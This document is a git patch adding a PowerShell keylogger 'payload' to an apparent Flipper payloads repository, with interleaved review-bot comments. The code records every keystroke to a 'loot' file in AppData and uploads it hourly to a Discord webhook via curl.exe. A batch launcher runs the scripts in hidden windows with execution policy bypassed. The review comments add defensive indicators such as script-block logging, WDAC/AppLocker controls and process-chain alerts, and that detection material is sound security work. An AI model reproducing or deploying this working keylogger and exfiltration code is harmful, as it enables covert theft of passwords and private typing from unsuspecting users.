From b2880e8a713dd40edb952918c894d7c880983ed3 Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby
Date: Fri, 23 Dec 2022 12:14:01 -0600
Subject: [PATCH] Add files via upload
---
Payloads/Flip-Keylogger/-keys.ps1 | 62 ++++++++++++++++++++++
Payloads/Flip-Keylogger/-logs.ps1 | 88 +++++++++++++++++++++++++++++++
Payloads/Flip-Keylogger/-p.cmd | 10 ++++
3 files changed, 160 insertions(+)
create mode 100644 Payloads/Flip-Keylogger/-keys.ps1
create mode 100644 Payloads/Flip-Keylogger/-logs.ps1
create mode 100644 Payloads/Flip-Keylogger/-p.cmd
diff --git a/Payloads/Flip-Keylogger/-keys.ps1 b/Payloads/Flip-Keylogger/-keys.ps1
new file mode 100644
index 0000000..282a2cf
--- /dev/null
+++ b/Payloads/Flip-Keylogger/-keys.ps1
@@ -0,0 +1,62 @@
+function XXXlog($Path="$env:appdata\-locker\$env:UserName-loot.txt"){
+ $signatures = @'
+ [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
+ public static extern short GetAsyncKeyState(int virtualKeyCode);
+ [DllImport("user32.dll", CharSet=CharSet.Auto)]
+ public static extern int GetKeyboardState(byte[] keystate);
+ [DllImport("user32.dll", CharSet=CharSet.Auto)]
+ public static extern int MapVirtualKey(uint uCode, int uMapType);
+ [DllImport("user32.dll", CharSet=CharSet.Auto)]
+ public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
+'@
+
+ $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
+
+
+ $null = New-Item -Path $Path -ItemType File -Force
+
+ try
+ {
+ Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
+
+ while ($true) {
+ Start-Sleep -Milliseconds 40
+
+
+ for ($ascii = 9; $ascii -le 254; $ascii++) {
+
+ $state = $API::GetAsyncKeyState($ascii)
+
+
+ if ($state -eq -32767) {
+ $null = [console]::CapsLock
+
+
+ $virtualKey = $API::MapVirtualKey($ascii, 3)
+
+
+ $kbstate = New-Object Byte[] 256
+ $checkkbstate = $API::GetKeyboardState($kbstate)
+
+
+ $mychar = New-Object -TypeName System.Text.StringBuilder
+
+ $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
+
+ if ($success)
+ {
+
+ [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
+ }
+ }
+ }
+ }
+ }
+ finally
+ {
+
+ #notepad $Path
+ }
+}
+
+XXXlog
diff --git a/Payloads/Flip-Keylogger/-logs.ps1 b/Payloads/Flip-Keylogger/-logs.ps1
new file mode 100644
index 0000000..55a7a0a
--- /dev/null
+++ b/Payloads/Flip-Keylogger/-logs.ps1
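Review bot: The function has no comment saying what it records or where the data goes, and two names mislead a reader: `$ascii` iterates virtual-key codes 9–254, and `$virtualKey` holds the result of `MapVirtualKey($ascii, 3)`, which is then passed to `ToUnicode` as the scan-code argument. A header such as `# Polls GetAsyncKeyState every 40 ms and appends each translated character, unencrypted, to $Path` would state the behaviour a triager needs. On the defensive side, the `Add-Type -MemberDefinition` block with the four user32.dll imports is the most stable indicator: PowerShell script-block logging (event 4104) records it verbatim, and Constrained Language Mode enforced through WDAC or AppLocker blocks `Add-Type` of arbitrary C# such as this. The other artifact is the file created at `$env:appdata\-locker\$env:UserName-loot.txt`.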
@@ -0,0 +1,88 @@
+# powershell log scheduler
+# created by : C0SM0
+# Modified by : Jakoby
+
+$Path="$env:appdata\-locker\$env:UserName-loot.txt"
+
+function Upload-Discord {
+
+[CmdletBinding()]
+param (
+ [parameter(Position=0,Mandatory=$False)]
+ [string]$file,
+ [parameter(Position=1,Mandatory=$False)]
+ [string]$text
+)
+
+$hookurl = "$dc"
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $text
+}
+
+if (-not ([string]::IsNullOrEmpty($text))){
+Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
+
+if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
+}
+
+if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:tmp/$ZIP"}
+
+
+
+# times logs will be sent [keep in military time]
+$logTimes = @(
+ '00:00:00',
+ '01:00:00',
+ '02:00:00',
+ '03:00:00',
+ '04:00:00',
+ '05:00:00',
+ '06:00:00',
+ '07:00:00',
+ '08:00:00',
+ '09:00:00',
+ '10:00:00',
+ '11:00:00',
+ '12:00:00',
+ '13:00:00',
+ '14:00:00',
+ '15:00:00',
+ '16:00:00',
+ '17:00:00',
+ '18:00:00',
+ '19:00:00',
+ '20:00:00',
+ '21:00:00',
+ '22:00:00',
+ '23:00:00'
+)
+
+# sort the times in chronological order
+$logTimes = $logTimes | Sort-Object
+
+# ensure keylogger runs every day
+while ($true) {
+
+ # run keylogger for each trigger time
+ foreach ($t in $logTimes)
+ {
+ # checks if time passed already
+ if((Get-Date) -lt (Get-Date -Date $t))
+ {
+ # sleeps until next time is reached
+ while ((Get-Date -Date $t) -gt (Get-Date))
+ {
+ # sleeps
+ (Get-Date -Date $t) - (Get-Date) | Start-Sleep
+ }
+
+ # runs keylogger
+ Upload-Discord -file $Path
+ echo "" > $Path
+ #powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/keys.ps1"
+
+ }
+ }
+}
\ No newline at end of file
diff --git a/Payloads/Flip-Keylogger/-p.cmd b/Payloads/Flip-Keylogger/-p.cmd
new file mode 100644
index 0000000..1594907
--- /dev/null
+++ b/Payloads/Flip-Keylogger/-p.cmd
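Review bot: The comment `# runs keylogger` near the end of the loop does not match the code under it: the two live lines upload `$Path` through `Upload-Discord` and then truncate it with `echo "" > $Path`, while the launch line is commented out; `# upload the captured log, then truncate it` would be accurate. The destination is read from `$dc`, which is not assigned anywhere in this hunk, so the endpoint cannot be taken from this file as an indicator. For responders this means the on-disk file holds at most the keystrokes since the last full hour, and earlier data exists only in whatever network telemetry captured the `curl.exe -F` multipart POST. An egress or proxy alert on `curl.exe` started by `powershell.exe` with a file form field covers the file path; the text path goes through `Invoke-RestMethod` instead.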
@@ -0,0 +1,10 @@
+@echo off
+powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/keys.ps1"
+powershell Start-Process powershell.exe -windowstyle hidden -ep bypass "$env:appdata/-locker/logs.ps1"
+
+
+
+
+
+
+
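Review bot: The launcher carries no comment explaining that each line starts a second, windowless PowerShell with the execution policy overridden; a line such as `rem Starts the capture and upload scripts in hidden PowerShell windows (-ep bypass)` would say so. Execution policy is not a security boundary, so `-ep bypass` is expected to succeed on a default host, and script allow-listing through WDAC or AppLocker is the control that actually applies here. For detection, process-creation logging shows the chain cmd.exe → powershell.exe → powershell.exe with `-windowstyle hidden -ep bypass` and a script path under `%APPDATA%\-locker`, a combination that is uncommon in normal use.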